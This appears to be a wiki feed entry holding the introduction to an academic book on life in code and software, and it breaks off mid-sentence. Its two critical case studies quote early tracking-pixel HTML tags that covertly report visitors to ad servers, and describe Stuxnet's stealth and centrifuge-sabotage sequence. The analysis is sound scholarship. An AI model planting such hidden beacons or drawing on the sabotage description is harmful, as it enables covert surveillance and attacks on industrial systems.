[15] Computational actants, drawing on the notion of the actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species.

[16] Here I tentatively raise the suggestion that a future critical theory of code and software should be committed to the ''un-building'', ''dis-assembling'' and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4995</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4995"/>
		<updated>2012-06-21T11:13:46Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. For example, 427 million Europeans (or 65 percent) use the Internet and more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand driven by the network effects of digital media. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. 
That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, yet nonetheless having concrete effects. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. Although it is useful to note that theorists, such as Frabetti (2010), problematise Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. 
Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website, it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to 